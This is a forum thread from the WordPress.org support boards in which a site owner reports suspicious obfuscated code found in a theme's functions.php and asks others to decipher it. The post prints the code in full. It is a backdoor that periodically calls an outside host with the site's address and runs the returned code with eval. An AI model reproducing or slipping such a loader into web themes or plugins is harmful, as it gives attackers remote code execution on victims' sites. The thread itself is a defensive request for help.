WordPress.org

Ready to get started?Download WordPress

Forums

Sketchy code in Rounded V2 Blue Edition theme (4 posts)

  1. loudwater
    Member
    Posted 5 years ago #

    We've been using a theme for our site based on Rounded V2 Blue Edition theme from http://www.itcouldbethisone.com/. Our blog stopped loading this morning with no changes being made to it so I initially thought one of the widgets we're using wasn't loading in a timely manner. Upon further inspection I found this code embedded in functions.php in the theme:

    function xfooter()  {   global $wpdb;     $R2540568A6546AA7FA75DF902886B3AF8 = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_time'");   $R41CCFE75D7AC2B4681397CFC70BAEF40 = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_eval'");     if (empty($R2540568A6546AA7FA75DF902886B3AF8)) {    $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_time', '0', 'no')");    $R051685ACC577342D1FDE6EBF2CD1779F = 0;   } else $R051685ACC577342D1FDE6EBF2CD1779F = intval($R2540568A6546AA7FA75DF902886B3AF8[0]);     if (empty($R41CCFE75D7AC2B4681397CFC70BAEF40)) {    $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_eval', '<br />', 'no')");    $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = '<br />';   } else $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = $R41CCFE75D7AC2B4681397CFC70BAEF40[0];       @eval('$R14AF1BE9EE26A90921E64A82E7836797 = 1;');   if($R14AF1BE9EE26A90921E64A82E7836797)   {    $R5F38CE9C0B222F3BB0880E016DC07527 = "1";   }   else   {    $R5F38CE9C0B222F3BB0880E016DC07527 = "0";   }     if ( ( time() - $R051685ACC577342D1FDE6EBF2CD1779F ) >= 3600  ) {      $R39C188653EA53DBD6E3F1D3915EDAC0C = "com";    $R8088818E3E46A17C12F2EE42EB12D7AC = "2.";    $R7B934F06258B8BA3608E30CDE9EA1035 = "xpstatz";    $RAD8CC24399FEA84D3454DD7057C38FD0 = "xps-$R5F38CE9C0B222F3BB0880E016DC07527.";    $RBF7582359E6813BD7C54DD76E7505037 = "$R8088818E3E46A17C12F2EE42EB12D7AC$R7B934F06258B8BA3608E30CDE9EA1035.$R39C188653EA53DBD6E3F1D3915EDAC0C";    $RA81C90DCC503F6900F7DC424AD04F525 = "/".$RAD8CC24399FEA84D3454DD7057C38FD0."php?h=" . urlencode($_SERVER['HTTP_HOST']) . "&u=" . urlencode($_SERVER['REQUEST_URI']);      if (ini_get('allow_url_fopen')) {     $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = @file_get_contents("http://" . $RBF7582359E6813BD7C54DD76E7505037 . $RA81C90DCC503F6900F7DC424AD04F525);    } else {     $RF500F4A848E2EB2F8AAC3A6734D7EC38 = @fsockopen($RBF7582359E6813BD7C54DD76E7505037, '80', $R87844B1C6FC922407E6020B6B224950F, $R1966719AEC0096F98BA934D649A6E28D, 30);     if ($RF500F4A848E2EB2F8AAC3A6734D7EC38) {      @stream_set_timeout($RF500F4A848E2EB2F8AAC3A6734D7EC38, 60);        @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "GET $RA81C90DCC503F6900F7DC424AD04F525 HTTP/1.1\r\n");      @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Host: $RBF7582359E6813BD7C54DD76E7505037\r\n");      @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Connection: Close\r\n\r\n");        $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = "";        while(!feof($RF500F4A848E2EB2F8AAC3A6734D7EC38)) {       $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 .= @fgets($RF500F4A848E2EB2F8AAC3A6734D7EC38, 1024);      }        $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = trim(strstr($RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1, "\r\n\r\n"));     }       @fclose($RF500F4A848E2EB2F8AAC3A6734D7EC38);    }      if ( is_string($RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1) ) {     $R051685ACC577342D1FDE6EBF2CD1779F = time();  if($R14AF1BE9EE26A90921E64A82E7836797)  {    @eval($RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1);  }  else  {    echo "$RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1";  }    $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = mysql_real_escape_string($RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1);       $wpdb->query("UPDATE $wpdb->options SET option_value=$R051685ACC577342D1FDE6EBF2CD1779F WHERE option_name='l_time'");     $wpdb->query("UPDATE $wpdb->options SET option_value='$RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1' WHERE option_name='l_eval'");    }   }    }
    
    ?>

    From what I can tell, it looks like it opens up a connection to our database then connects to 1.xpstatz.com but the code is so heavily obfuscated I'm not sure what else it's doing. I think xpstatz.com went down today which is why it was hanging up the page, but it's been up like this for several weeks and I'm a bit concerned about what it's done in the mean time.

    Can any decipher this? Thanks

    -Marc

  2. whooami
    Member
    Posted 5 years ago #

    http://wordpress.pastebin.com/m6bac99c0

    its already been decoded.

  3. loudwater
    Member
    Posted 5 years ago #

    Thanks whooami, any idea what this does? I'm not much of a coder.

  4. cavendash
    Member
    Posted 5 years ago #

    Any updates on this? I just installed a version of this theme on my site & want to make sure it does not contain any malware.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.